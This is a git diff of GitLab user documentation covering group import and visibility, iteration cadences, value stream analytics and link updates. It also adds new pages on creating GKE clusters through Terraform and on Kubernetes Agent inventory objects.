a/doc/user/group/import/index.md +++ b/doc/user/group/import/index.md @@ -22,6 +22,7 @@ The following resources are migrated to the target instance: - description - attributes - subgroups + - avatar ([Introduced in 14.0](https://gitlab.com/gitlab-org/gitlab/-/issues/322904)) - Group Labels ([Introduced in 13.9](https://gitlab.com/gitlab-org/gitlab/-/issues/292429)) - title - description @@ -109,7 +110,7 @@ on an existing group's page. 1. On the New Group page, select **Import group**. -  +  1. Fill in source URL of your GitLab. 1. Fill in [personal access token](../../../user/profile/personal_access_tokens.md) for remote GitLab instance. @@ -118,14 +119,14 @@ on an existing group's page. ### Selecting which groups to import After you have authorized access to the GitLab instance, you are redirected to the GitLab Group -Migration importer page. Your remote GitLab groups, which you have Owner access to, are listed. +Migration importer page. Listed are the remote GitLab groups to which you have the Owner role. 1. By default, the proposed group namespaces match the names as they exist in remote instance, but based on your permissions, you can choose to edit these names before you proceed to import any of them. 1. Select the **Import** button next to any number of groups. -1. The **Status** column shows the import status of each group. You can choose to leave the page open and it will update in real-time. +1. The **Status** column shows the import status of each group. You can choose to leave the page open and it updates in real-time. 1. Once a group has been imported, click its GitLab path to open its GitLab URL. - + diff --git a/doc/user/group/index.md b/doc/user/group/index.md index 15fbb442752..787461f9d96 100644 --- a/doc/user/group/index.md +++ b/doc/user/group/index.md @@ -29,6 +29,21 @@ To view groups: You can also view groups by namespace. +### Group visibility + +Like projects, a group can be configured to limit the visibility of it to: + +- Anonymous users. +- All signed-in users. +- Only explicit group members. + +The restriction for [visibility levels](../admin_area/settings/visibility_and_access_controls.md#restricted-visibility-levels) +on the application setting level also applies to groups. If set to internal, the explore page is +empty for anonymous users. The group page has a visibility level icon. + +Administrator users cannot create a subgroup or project with a higher visibility level than that of +the immediate parent group. + ### Namespaces In GitLab, a namespace is a unique name and URL for a user, a group, or subgroup. diff --git a/doc/user/group/iterations/index.md b/doc/user/group/iterations/index.md index 38d209f04ca..5a435f32569 100644 --- a/doc/user/group/iterations/index.md +++ b/doc/user/group/iterations/index.md @@ -11,9 +11,9 @@ info: To determine the technical writer assigned to the Stage/Group associated w > - Deployed behind a feature flag, disabled by default. > - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/issues/221047) in GitLab 13.2. > - Enabled on GitLab.com. -> - Able to be enabled or disabled per-group. +> - Can be enabled or disabled per-group. > - Recommended for production use. -> - For GitLab self-managed instances, GitLab administrators can opt to [disable it](#disable-iterations). **(PREMIUM ONLY)** +> - For GitLab self-managed instances, GitLab administrators can opt to [disable it](#enable-or-disable-iterations). **(PREMIUM ONLY)** > - Moved to GitLab Premium in 13.9. Iterations are a way to track issues over a period of time. This allows teams @@ -32,31 +32,85 @@ In GitLab, iterations are similar to milestones, with a few differences: - Iterations require both a start and an end date. - Iteration date ranges cannot overlap. +## Iteration cadences + +> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/5077) in GitLab 14.1. +> - Deployed behind a [feature flag](../../feature_flags.md), disabled by default. +> - Disabled on GitLab.com. +> - Not recommended for production use. +> - To use in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-iteration-cadences). **(PREMIUM SELF)** + +This in-development feature might not be available for your use. There can be +[risks when enabling features still in development](../../feature_flags.md#risks-when-enabling-features-still-in-development). +Refer to this feature's version history for more details. + +Iteration cadences automate some common iteration tasks. They can be used to +automatically create iterations every 1, 2, 3, 4, or 6 weeks. They can also +be configured to automatically roll over incomplete issues to the next iteration. + +With iteration cadences enabled, you must first +[create an iteration cadence](#create-an-iteration-cadence) before you can +[create an iteration](#create-an-iteration). + +### Create an iteration cadence + +Prerequisites: + +- You must have at least the [Developer role](../../permissions.md) for a group. + +To create an iteration cadence: + +1. On the top bar, select **Menu > Groups** and find your group. +1. On the left sidebar, select **Issues > Iterations**. +1. Select **New iteration cadence**. +1. Fill out required fields, and select **Create iteration cadence**. The cadence list page opens. + +### Delete an iteration cadence + +Prerequisites: + +- You must have at least the [Developer role](../../permissions.md) for a group. + +Deleting an iteration cadence also deletes all iterations within that cadence. + +To delete an iteration cadence: + +1. On the top bar, select **Menu > Groups** and find your group. +1. On the left sidebar, select **Issues > Iterations**. +1. Select the three-dot menu (**{ellipsis_v}**) > **Delete cadence** for the cadence you want to delete. +1. Select **Delete cadence** in the confirmation modal. + ## View the iterations list -To view the iterations list, in a group, go to **{issues}** **Issues > Iterations**. -From there you can create a new iteration or click an iteration to get a more detailed view. +To view the iterations list, go to **{issues}** **Issues > Iterations**. +To view all the iterations in a cadence, ordered by descending date, select that iteration cadence. +From there you can create a new iteration or select an iteration to get a more detailed view. ## Create an iteration -NOTE: -You need Developer [permissions](../../permissions.md) or higher to create an iteration. +Prerequisites: + +- You must have at least the [Developer role](../../permissions.md) for a group. + +For manually scheduled iteration cadences, you create and add iterations yourself. To create an iteration: -1. In a group, go to **{issues}** **Issues > Iterations**. -1. Click **New iteration**. +1. On the top bar, select **Menu > Groups** and find your group. +1. On the left sidebar, select **Issues > Iterations**. +1. Select **New iteration**. 1. Enter the title, a description (optional), a start date, and a due date. -1. Click **Create iteration**. The iteration details page opens. +1. Select **Create iteration**. The iteration details page opens. ## Edit an iteration > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/218277) in GitLab 13.2. -NOTE: -You need Developer [permissions](../../permissions.md) or higher to edit an iteration. +Prerequisites: -To edit an iteration, click the three-dot menu (**{ellipsis_v}**) > **Edit iteration**. +- You must have at least the [Developer role](../../permissions.md) for a group. + +To edit an iteration, select the three-dot menu (**{ellipsis_v}**) > **Edit iteration**. ## Add an issue to an iteration @@ -76,7 +130,7 @@ The report also shows a breakdown of total issues in an iteration. Open iteration reports show a summary of completed, unstarted, and in-progress issues. Closed iteration reports show the total number of issues completed by the due date. -To view an iteration report, go to the iterations list page and click an iteration's title. +To view an iteration report, go to the iterations list page and select an iteration's title. ### Iteration burndown and burnup charts @@ -99,13 +153,15 @@ and get a more accurate understanding of scope attributable to each label. To group issues by label: +1. On the top bar, select **Menu > Groups** and find your group. +1. On the left sidebar, select **Issues > Iterations**. 1. In the **Group by** dropdown, select **Label**. 1. Select the **Filter by label** dropdown. 1. Select the labels you want to group by in the labels dropdown. You can also search for labels by typing in the search input. -1. Click or tap outside of the label dropdown. The page is now grouped by the selected labels. +1. Select or tap outside of the label dropdown. The page is now grouped by the selected labels. -## Disable iterations **(PREMIUM SELF)** +## Enable or disable iterations **(PREMIUM SELF)** GitLab Iterations feature is deployed with a feature flag that is **enabled by default**. [GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) @@ -129,6 +185,25 @@ Feature.disable(:group_iterations) Feature.disable(:group_iterations, Group.find(<group ID>)) ``` +### Enable or disable iteration cadences **(PREMIUM SELF)** + +Iteration Cadences feature is under development and not ready for production use. It is +deployed behind a feature flag that is **disabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) +can enable it. + +To enable it: + +```ruby +Feature.enable(:iteration_cadences) +``` + +To disable it: + +```ruby +Feature.disable(:iteration_cadences) +``` + <!-- ## Troubleshooting Include any troubleshooting steps that you can foresee. If you know beforehand what issues diff --git a/doc/user/group/repositories_analytics/index.md b/doc/user/group/repositories_analytics/index.md index b9f94d96b48..054c6ab7a6b 100644 --- a/doc/user/group/repositories_analytics/index.md +++ b/doc/user/group/repositories_analytics/index.md @@ -41,7 +41,7 @@ To see the latest code coverage for each project in your group: 1. In the **Latest test coverage results** section, use the **Select projects** dropdown to choose the projects you want to check. You can download code coverage data for specific projects using -[code coverage history](../../../ci/pipelines/settings.md#code-coverage-history). +[code coverage history](../../../ci/pipelines/settings.md#view-code-coverage-history). ## Download historic test coverage data diff --git a/doc/user/group/saml_sso/img/saml_group_links_v13_9.png b/doc/user/group/saml_sso/img/saml_group_links_v13_9.png Binary files differindex 9bd2473f90c..1e0aa131aad 100644 --- a/doc/user/group/saml_sso/img/saml_group_links_v13_9.png +++ b/doc/user/group/saml_sso/img/saml_group_links_v13_9.png diff --git a/doc/user/group/saml_sso/index.md b/doc/user/group/saml_sso/index.md index 8a5cdb79186..c3b57018154 100644 --- a/doc/user/group/saml_sso/index.md +++ b/doc/user/group/saml_sso/index.md @@ -10,7 +10,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w > Introduced in GitLab 11.0. This page describes SAML for Groups. For instance-wide SAML on self-managed GitLab instances, see [SAML OmniAuth Provider](../../../integration/saml.md). -[View the differences between SaaS and Self-Managed Authentication and Authorization Options](../../../administration/auth/README.md#saas-vs-self-managed-comparison). +[View the differences between SaaS and Self-Managed Authentication and Authorization Options](../../../administration/auth/index.md#saas-vs-self-managed-comparison). SAML on GitLab.com allows users to sign in through their SAML identity provider. If the user is not already a member, the sign-in process automatically adds the user to the appropriate group. @@ -330,11 +330,11 @@ Ensure your SAML identity provider sends an attribute statement named `Groups` o NOTE: To inspect the SAML response, you can use one of these [SAML debugging tools](#saml-debugging-tools). -Also note that the value for `Groups` or `groups` in the SAML reponse can be either the group name or +Also note that the value for `Groups` or `groups` in the SAML reponse can be either the group name or the group ID depending what the IdP sends to GitLab. When SAML SSO is enabled for the top-level group, `Maintainer` and `Owner` level users -see a new menu item in group **Settings > SAML Group Links**. You can configure one or more **SAML Group Links** to map +see a new menu item in group **Settings > SAML Group Links**. You can configure one or more **SAML Group Links** to map a SAML identity provider group name to a GitLab Access Level. This can be done for the parent group or the subgroups. To link the SAML groups from the `saml:AttributeStatement` example above: diff --git a/doc/user/group/settings/img/import_panel_v13_4.png b/doc/user/group/settings/img/import_panel_v13_4.png Binary files differdeleted file mode 100644 index e4e5b0e91a1..00000000000 --- a/doc/user/group/settings/img/import_panel_v13_4.png +++ /dev/null diff --git a/doc/user/group/settings/img/import_panel_v14_1.png b/doc/user/group/settings/img/import_panel_v14_1.png Binary files differnew file mode 100644 index 00000000000..28417383b6c --- /dev/null +++ b/doc/user/group/settings/img/import_panel_v14_1.png diff --git a/doc/user/group/settings/import_export.md b/doc/user/group/settings/import_export.md index c097790ef16..5f732bee03f 100644 --- a/doc/user/group/settings/import_export.md +++ b/doc/user/group/settings/import_export.md @@ -70,7 +70,7 @@ For more details on the specific data persisted in a group export, see the  -1. After the export is generated, you should receive an e-mail with a link to the [exported contents](#exported-contents) +1. After the export is generated, you should receive an email with a link to the [exported contents](#exported-contents) in a compressed tar archive, with contents in NDJSON format. 1. Alternatively, you can come back to the project settings and download the @@ -84,7 +84,7 @@ As an administrator, you can modify the maximum import file size. To do so, use You can export groups from the [Community Edition to the Enterprise Edition](https://about.gitlab.com/install/ce-or-ee/) and vice versa. -The Enterprise Edition retains some group data that isn't part of the Community Edition. If you're exporting a group from the Enterprise Edition to the Community Edition, you may lose this data. For more information, see [downgrading from EE to CE](../../../README.md). +The Enterprise Edition retains some group data that isn't part of the Community Edition. If you're exporting a group from the Enterprise Edition to the Community Edition, you may lose this data. For more information, see [downgrading from EE to CE](../../../index.md). ## Importing the group @@ -93,9 +93,9 @@ on an existing group's page.  -1. On the New Group page, select the **Import group** tab. +1. On the New Group page, select the **Import group**. -  +  1. Enter your group name. diff --git a/doc/user/group/subgroups/index.md b/doc/user/group/subgroups/index.md index 4532a391eef..7d674b5deac 100644 --- a/doc/user/group/subgroups/index.md +++ b/doc/user/group/subgroups/index.md @@ -125,7 +125,7 @@ When you add a member to a group, that member is also added to all subgroups. Permission level is inherited from the group's parent. This model allows access to subgroups if you have membership in one of its parents. -Jobs for pipelines in subgroups can use [runners](../../../ci/runners/README.md) registered to the parent group(s). +Jobs for pipelines in subgroups can use [runners](../../../ci/runners/index.md) registered to the parent group(s). This means secrets configured for the parent group are available to subgroup jobs. In addition, maintainers of projects that belong to subgroups can see the details of runners registered to parent group(s). diff --git a/doc/user/group/value_stream_analytics/index.md b/doc/user/group/value_stream_analytics/index.md index c1dd363c313..773d41947e2 100644 --- a/doc/user/group/value_stream_analytics/index.md +++ b/doc/user/group/value_stream_analytics/index.md @@ -65,7 +65,8 @@ To filter results: > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/13216) in GitLab 12.4. -GitLab provides the ability to filter analytics based on a date range. Data is shown for workflow items created during the selected date range. To filter results: +GitLab provides the ability to filter analytics based on a date range. +Data is shown for workflow items created during the selected date range. To filter results: 1. Select a group. 1. Optionally select a project. @@ -82,13 +83,16 @@ The "Time" metrics near the top of the page are measured as follows: The "Recent Activity" metrics near the top of the page are measured as follows: - **New Issues:** the number of issues created in the date range. -- **Deploys:** the number of deployments to production (1) in the date range. -- **Deployment Frequency:** the average number of deployments to production (1) per day in the date range. +- **Deploys:** the number of deployments <sup>1</sup> to production <sup>2</sup> in the date range. +- **Deployment Frequency:** the average number of deployments <sup>1</sup> to production <sup>2</sup> + per day in the date range. -(1) To give a more accurate representation of deployments that actually completed successfully, -the calculation for these two metrics changed in GitLab 13.9 from using the time a deployment was -created to the time a deployment finished. If you were referencing this metric prior to 13.9, please -keep this slight change in mind. +1. To give a more accurate representation of deployments that actually completed successfully, + the calculation for these two metrics changed in GitLab 13.9 from using the time a deployment was + created to the time a deployment finished. If you were referencing this metric prior to 13.9, please + keep this slight change in mind. +1. To see deployment metrics, you must have a + [production environment configured](../../../ci/environments/index.md#deployment-tier-of-environments). You can learn more about these metrics in our [analytics definitions](../../analytics/index.md). @@ -96,16 +100,16 @@ You can learn more about these metrics in our [analytics definitions](../../anal ## How the stages are measured -Value Stream Analytics measures each stage from its start event to its stop event. +Value Stream Analytics measures each stage from its start event to its end event. For example, a stage might start when one label is added to an issue, and end when another label is added. -Value Stream Analytics excludes work in progress, meaning it ignores any items that have not reached the stop event. +Value Stream Analytics excludes work in progress, meaning it ignores any items that have not reached the end event. Each stage of Value Stream Analytics is further described in the table below. | **Stage** | **Description** | | --------- | --------------- | | Issue | Measures the median time between creating an issue and taking action to solve it, by either labeling it or adding it to a milestone, whatever comes first. The label is tracked only if it already has an [Issue Board list](../../project/issue_board.md) created for it. | -| Plan | Measures the median time between the action you took for the previous stage, and pushing the first commit to the branch. The very first commit of the branch is the one that triggers the separation between **Plan** and **Code**, and at least one of the commits in the branch needs to contain the related issue number (e.g., `#42`). If none of the commits in the branch mention the related issue number, it is not considered to the measurement time of the stage. | +| Plan | Measures the median time between the action you took for the previous stage, and pushing the first commit to the branch. The very first commit of the branch is the one that triggers the separation between **Plan** and **Code**, and at least one of the commits in the branch needs to contain the related issue number (for example, `#42`). If none of the commits in the branch mention the related issue number, it is not considered to the measurement time of the stage. | | Code | Measures the median time between pushing a first commit (previous stage) and creating a merge request (MR) related to that commit. The key to keep the process tracked is to include the [issue closing pattern](../../project/issues/managing_issues.md#closing-issues-automatically) to the description of the merge request (for example, `Closes #xxx`, where `xxx` is the number of the issue related to this merge request). If the closing pattern is not present, then the calculation takes the creation time of the first commit in the merge request as the start time. | | Test | Measures the median time to run the entire pipeline for that project. It's related to the time GitLab CI/CD takes to run every job for the commits pushed to that merge request defined in the previous stage. It is basically the start->finish time for all pipelines. | | Review | Measures the median time taken to review the merge request that has a closing issue pattern, between its creation and until it's merged. | @@ -121,7 +125,7 @@ How this works, behind the scenes: by the UI - default is 90 days). So it prohibits these pairs from being considered. 1. For the remaining `<issue, merge request>` pairs, we check the information that we need for the stages, like issue creation date, merge request merge time, - etc. + and so on. To sum up, anything that doesn't follow [GitLab flow](../../../topics/gitlab_flow.md) is not tracked and the Value Stream Analytics dashboard does not present any data for: @@ -133,7 +137,7 @@ Value Stream Analytics dashboard does not present any data for: ## How the production environment is identified Value Stream Analytics identifies production environments by looking for project -[environments](../../../ci/yaml/README.md#environment) with a name matching any of these patterns: +[environments](../../../ci/yaml/index.md#environment) with a name matching any of these patterns: - `prod` or `prod/*` - `production` or `production/*` @@ -144,7 +148,7 @@ You can change the name of a project environment in your GitLab CI/CD configurat ## Example workflow -Below is a simple fictional workflow of a single cycle that happens in a +Below is an example workflow of a single cycle that happens in a single day through all noted stages. Note that if a stage does not include a start and a stop time, its data is not included in the median time. It is assumed that milestones are created and a CI for testing and setting environments is configured. @@ -159,10 +163,11 @@ environments is configured. 12:00. 1. Make a second commit to the branch which mentions the issue number at 12.30 (stop of **Plan** stage / start of **Code** stage). -1. Push branch and create a merge request that contains the [issue closing pattern](../../project/issues/managing_issues.md#closing-issues-automatically) +1. Push branch and create a merge request that contains the + [issue closing pattern](../../project/issues/managing_issues.md#closing-issues-automatically) in its description at 14:00 (stop of **Code** stage / start of **Test** and **Review** stages). -1. The CI starts running your scripts defined in [`.gitlab-ci.yml`](../../../ci/yaml/README.md) and +1. The CI starts running your scripts defined in [`.gitlab-ci.yml`](../../../ci/yaml/index.md) and takes 5min (stop of **Test** stage). 1. Review merge request, ensure that everything is OK and merge the merge request at 19:00. (stop of **Review** stage / start of **Staging** stage). @@ -185,7 +190,7 @@ A few notes: commit doesn't mention the issue number, you can do this later in any commit of the branch you are working on. - You can see that the **Test** stage is not calculated to the overall time of - the cycle since it is included in the **Review** process (every MR should be + the cycle, because it is included in the **Review** process (every MR should be tested). - The example above was just **one cycle** of the seven stages. Add multiple cycles, calculate their median time and the result is what the dashboard of @@ -346,7 +351,7 @@ In this example, we'd like to measure times for deployment from a staging enviro After you create a value stream, you can customize it to suit your purposes. To edit a value stream: 1. Go to your group and select **Analytics > Value Stream**. -1. Find and select the relevant value stream from the value stream dropdown. +1. Find and select the relevant value stream from the value stream dropdown. 1. Next to the value stream dropdown, select **Edit**. The edit form is populated with the value stream details. 1. Optional: @@ -381,7 +386,7 @@ This chart visually depicts the average number of days it takes for cycles to be This chart uses the global page filters for displaying data based on the selected group, projects, and time frame. In addition, specific stages can be selected -from within the chart itself. +from the chart itself. The chart data is limited to the last 500 items. diff --git a/doc/user/img/todos_add_todo_sidebar.png b/doc/user/img/todos_add_todo_sidebar.png Binary files differdeleted file mode 100644 index aefec7a2d9c..00000000000 --- a/doc/user/img/todos_add_todo_sidebar.png +++ /dev/null diff --git a/doc/user/img/todos_add_todo_sidebar_v14_1.png b/doc/user/img/todos_add_todo_sidebar_v14_1.png Binary files differnew file mode 100644 index 00000000000..65120beca29 --- /dev/null +++ b/doc/user/img/todos_add_todo_sidebar_v14_1.png diff --git a/doc/user/img/todos_mark_done_sidebar.png b/doc/user/img/todos_mark_done_sidebar.png Binary files differdeleted file mode 100644 index 2badd880b40..00000000000 --- a/doc/user/img/todos_mark_done_sidebar.png +++ /dev/null diff --git a/doc/user/img/todos_mark_done_sidebar_v14_1.png b/doc/user/img/todos_mark_done_sidebar_v14_1.png Binary files differnew file mode 100644 index 00000000000..628fe65a7c1 --- /dev/null +++ b/doc/user/img/todos_mark_done_sidebar_v14_1.png diff --git a/doc/user/index.md b/doc/user/index.md index ab159cecdef..8fc91ec95ea 100644 --- a/doc/user/index.md +++ b/doc/user/index.md @@ -31,7 +31,7 @@ For more information, see [All GitLab Features](https://about.gitlab.com/feature To get familiar with the concepts needed to develop code on GitLab, read the following articles: - [Demo: Mastering Code Review With GitLab](https://about.gitlab.com/blog/2017/03/17/demo-mastering-code-review-with-gitlab/). -- [GitLab Workflow: An Overview](https://about.gitlab.com/topics/version-control/what-is-gitlab-workflow/#gitlab-workflow-a-use-case-scenario). +- [What is GitLab Flow?](https://about.gitlab.com/topics/version-control/what-is-gitlab-flow/). - [Tutorial: It's all connected in GitLab](https://about.gitlab.com/blog/2016/03/08/gitlab-tutorial-its-all-connected/): an overview on code collaboration with GitLab. - [Trends in Version Control Land: Microservices](https://about.gitlab.com/blog/2016/08/16/trends-in-version-control-land-microservices/). - [Trends in Version Control Land: Innersourcing](https://about.gitlab.com/topics/version-control/what-is-innersource/). @@ -46,7 +46,7 @@ GitLab is a Git-based platform that integrates a great number of essential tools - Organizing and prioritizing with [Issue Boards](project/issue_board.md). - Reviewing code in [Merge Requests](project/merge_requests/index.md) with live-preview changes per branch with [Review Apps](../ci/review_apps/index.md). -- Building, testing, and deploying with built-in [Continuous Integration](../ci/README.md). +- Building, testing, and deploying with built-in [Continuous Integration](../ci/index.md). - Deploying personal and professional static websites with [GitLab Pages](project/pages/index.md). - Integrating with Docker by using [GitLab Container Registry](packages/container_registry/index.md). - Tracking the development lifecycle by using [GitLab Value Stream Analytics](analytics/value_stream_analytics.md). @@ -64,7 +64,7 @@ With GitLab Enterprise Edition, you can also: - Leverage [Elasticsearch](../integration/elasticsearch.md) with [Advanced Search](search/advanced_search.md) for faster, more advanced code search across your entire GitLab instance. - [Authenticate users with Kerberos](../integration/kerberos.md). - [Mirror a repository](project/repository/repository_mirroring.md) from elsewhere on your local server. -- View your entire CI/CD pipeline involving more than one project with [Multiple-Project Pipelines](../ci/multi_project_pipelines.md). +- View your entire CI/CD pipeline involving more than one project with [Multiple-Project Pipelines](../ci/pipelines/multi_project_pipelines.md). - [Lock files](project/file_lock.md) to prevent conflicts. - View the current health and status of each CI environment running on Kubernetes with [Deploy Boards](project/deploy_boards.md). - Leverage continuous delivery method with [Canary Deployments](project/canary_deployments.md). @@ -136,7 +136,7 @@ merge requests, code snippets, and commits. When performing inline reviews to implementations to your codebase through merge requests you can -gather feedback through [resolvable threads](discussions/index.md#resolvable-comments-and-threads). +gather feedback through [resolvable threads](discussions/index.md#resolve-a-thread). ### GitLab Flavored Markdown (GFM) @@ -164,7 +164,7 @@ you have quick access to. You can also gather feedback on them through ## GitLab CI/CD -Use built-in [GitLab CI/CD](../ci/README.md) to test, build, and deploy your applications +Use built-in [GitLab CI/CD](../ci/index.md) to test, build, and deploy your applications directly from GitLab. No third-party integrations needed. ## Features behind feature flags @@ -189,7 +189,7 @@ POST request with data to the webhook URL. ## API -Automate GitLab via [API](../api/README.md). +Automate GitLab via [API](../api/index.md). ## Git and GitLab diff --git a/doc/user/infrastructure/clusters/connect/new_gke_cluster.md b/doc/user/infrastructure/clusters/connect/new_gke_cluster.md new file mode 100644 index 00000000000..35af316d7ac --- /dev/null +++ b/doc/user/infrastructure/clusters/connect/new_gke_cluster.md @@ -0,0 +1,94 @@ +--- +stage: Configure +group: Configure +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# New GKE cluster through IaC + +Learn how to create a new cluster on Google Kubernetes Engine (GKE) through +[Infrastructure as Code (IaC)](../../index.md). + +This process combines the GitLab Terraform and Google Terraform providers +with Kubernetes to help you create GKE clusters and deploy them through +GitLab. + +This document describes how to set up a [group-level cluster](../../../group/clusters/index.md) on GKE by importing an example project to get you started. +You can then modify the project files according to your needs. + +**Prerequisites:** + +- A GitLab group. +- A GitLab user with the Maintainer role in the group. +- A [GitLab personal access token](../../../profile/personal_access_tokens.md) with `api` access, created by a user with at least the Maintainer role in the group. +- A [Google Cloud Platform (GCP) service account](https://cloud.google.com/docs/authentication/getting-started). + +**Steps:** + +1. [Import the example project](#import-the-example-project). +1. [Add your GCP credentials to GitLab](#add-your-gcp-credentials-to-gitlab). +1. [Configure your project](#configure-your-project). +1. [Deploy your cluster](#deploy-your-cluster). + +## Import the example project + +Start by [importing the example project by URL](../../../project/import/repo_by_url.md). Use `https://gitlab.com/gitlab-org/configure/examples/gitlab-terraform-gke.git` as URL. + +## Add your GCP credentials to GitLab + +After importing the project, you need to set up [CI environment variables](../../../../ci/variables/index.md) to associate your cluster on GCP to your group in GitLab. + +We advise that you [set environment variables through the GitLab UI](../../../../ci/variables/index.md#add-a-cicd-variable-to-a-project) +so that your credentials are not exposed through the code. To do so, follow the steps below. + +### Prepare your credentials on GCP + +1. Create a [GCP service account](https://cloud.google.com/docs/authentication/getting-started) to authenticate GCP with GitLab. It needs the following roles: `Computer Network Viewer`, `Kubernetes Engine Admin`, and `Service Account User`. +1. Download the JSON file with the service account key. +1. On your computer, encode the JSON file to `base64` (replace `/path/to/sa-key.json` to the path to your key): + + ```shell + base64 /path/to/sa-key.json | tr -d \\n` + ``` + +1. Use the output of this command as the `BASE64_GOOGLE_CREDENTIALS` environment variable in the next step. + +### Add your credentials to GitLab as environment variables + +1. On GitLab, from your project's sidebar, go to **Settings > CI/CD** and expand **Variables**. +1. Add your `GITLAB_TOKEN` ([personal access token](../../../profile/personal_access_tokens.md)). +1. Add the variable `BASE64_GOOGLE_CREDENTIALS` from the previous step. + +## Configure your project + +After authenticating with GCP, replace the project's defaults from the example +project with your own. To do so, edit the files as described below. + +Edit `gke.tf`: + +1. **(Required)** Replace the GCP `project` with a unique project name. +1. **(Optional)** Choose the `name` of your cluster. +1. **(Optional)** Choose the `region` and `zone` that you would like to deploy your cluster to. +1. Push the changes to your project's default branch. + +Edit `group_cluster.tf`: + +1. **(Required)**: Replace the `full_path` with the path to your group. +1. **(Optional)**: Choose your cluster base domain through `domain`. +1. **(Optional)**: Choose your environment through `environment_scope`. +1. Push the changes to your project's default branch. + +Refer to the [GitLab Terraform provider](https://registry.terraform.io/providers/gitlabhq/gitlab/latest/docs) and the [Google Terraform provider](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) documentation for further resource options. + +## Deploy your cluster + +After adjusting the files in the previous step, manually trigger the deployment of your cluster. In GitLab: + +1. From your project's sidebar, go to **CI/CD > Pipelines**. +1. Select the dropdown icon (**{angle-down}**) next to the play icon (**{play}**). +1. Select **deploy** to manually trigger the deployment job. + +When the pipeline finishes successfully, you can see your new cluster: + +- In GCP: on your [GCP console's Kubernetes list](https://console.cloud.google.com/kubernetes/list). +- In GitLab: from your project's sidebar, select **Infrastructure > Kubernetes clusters**. diff --git a/doc/user/infrastructure/clusters/deploy/inventory_object.md b/doc/user/infrastructure/clusters/deploy/inventory_object.md new file mode 100644 index 00000000000..d5840641aab --- /dev/null +++ b/doc/user/infrastructure/clusters/deploy/inventory_object.md @@ -0,0 +1,69 @@ +--- +stage: Configure +group: Configure +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Inventory object **(PREMIUM)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/332227) in GitLab 14.0. + +An inventory object is a `ConfigMap` object for keeping track of the set of objects applied to a cluster. +When you remove objects from a manifest repository, GitLab Kubernetes Agent uses a corresponding inventory object to +prune (delete) objects from the cluster. + +The GitLab Kubernetes Agent creates an inventory object for each manifest project specified in the +`gitops.manifest_projects` configuration section. The inventory object has to be stored somewhere in the cluster. +The default behavior is: + +- The `namespace` used comes from `gitops.manifest_projects[].default_namespace`. If you don't specify this parameter + explicitly, the inventory object is stored in the `default` namespace. +- The `name` is generated from the numeric project ID of the manifest project and the numeric agent ID. + + This way the GitLab Kubernetes Agent constructs the name and local where the inventory object is + stored in the cluster. + +The GitLab Kubernetes Agent cannot locate the existing inventory object if you: + +- Change `gitops.manifest_projects[].default_namespace` parameter. +- Move manifests into another project. + +## Inventory object template + +The inventory object template is a `ConfigMap` object that allows you to configure the namespace and the name of the inventory +object. Store this template with manifest files in a single group. + +Example inventory object template: + +```yaml +apiVersion: v1 +kind: ConfigMap +metadata: + name: unique-name-for-the-inventory + namespace: my-project-namespace + labels: + cli-utils.sigs.k8s.io/inventory-id: unique-name-for-the-inventory +``` + +- The `namespace` and `name` fields configure where the real inventory object is created. +- The `cli-utils.sigs.k8s.io/inventory-id` label with its corresponding value is set on the inventory object, created + from this template. Make sure that the value is unique (for example, a string of random characters) and doesn't clash + with any existing or future inventory object templates. +- Objects tracked by this inventory object have the `config.k8s.io/owning-inventory` annotation set to the value of + the `cli-utils.sigs.k8s.io/inventory-id` label. +- The label's value doesn't have to match the `name` but it's convenient to have them set to the same value. +- Make sure that the `name` is unique so that it doesn't conflict with another inventory object in the same + namespace in the future. + +## Using GitOps with pre-existing Kubernetes objects + +The GitLab Kubernetes Agent treats manifest files in the manifest repository as the source of truth. When it applies +objects from the files to the cluster, it tracks them in an inventory object. If an object already exists, +GitLab Kubernetes Agent behaves differently based on the `gitops.manifest_projects[].inventory_policy` configuration. +Check the table below with the available options and when to use them. + +`inventory_policy` value | Description | +------------------------ | ------------------------------------------------------------------------------------------- | +`must_match` | This is the default policy. A live object must have the `config.k8s.io/owning-inventory` annotation set to the same value as the `cli-utils.sigs.k8s.io/inventory-id` label on the corresponding inventory object to be updated. Object is not updated and an error is reported if the values don't match or the object doesn't have the annotation. | +`adopt_if_no_inventory` | This mode allows to "adopt" an object if it doesn't have the `config.k8s.io/owning-inventory` annotation. Use this mode if you want to start managing existing objects using the GitOps feature. Once all objects have been "adopted", we recommend you to put the setting back into the default `must_match` mode to avoid any unexpected adoptions. | +`adopt_all` | This mode allows to "adopt" an object even if it has the `config.k8s.io/owning-inventory` annotation set to a different value. This mode can be useful if you want to migrate a set of objects from one agent to another one or from some other tool to the GitLab Kubernetes Agent. Once all objects have been "adopted", we recommend you to put the setting back into the default `must_match` mode to avoid any unexpected adoptions. | diff --git a/doc/user/infrastructure/index.md b/doc/user/infrastructure/index.md index 05ffab93f85..bdaae4b8225 100644 --- a/doc/user/infrastructure/index.md +++ b/doc/user/infrastructure/index.md @@ -16,7 +16,7 @@ GitLab, and support Terraform best practices. ## Quick Start Use the following `.gitlab-ci.yml` to set up a basic Terraform project integration -for GitLab versions 13.5 and later: +for GitLab versions 14.0 and later: ```yaml include: @@ -38,7 +38,7 @@ This template includes some opinionated decisions, which you can override: - Creating [four pipeline stages](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Terraform.gitlab-ci.yml): `init`, `validate`, `build`, and `deploy`. These stages [run the Terraform commands](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Terraform/Base.gitlab-ci.yml) - `init`, `validate`, `plan`, `plan-json`, and `apply`. The `apply` command only runs on `master`. + `init`, `validate`, `plan`, `plan-json`, and `apply`. The `apply` command only runs on the default branch. This video from January 2021 walks you through all the GitLab Terraform integration features: @@ 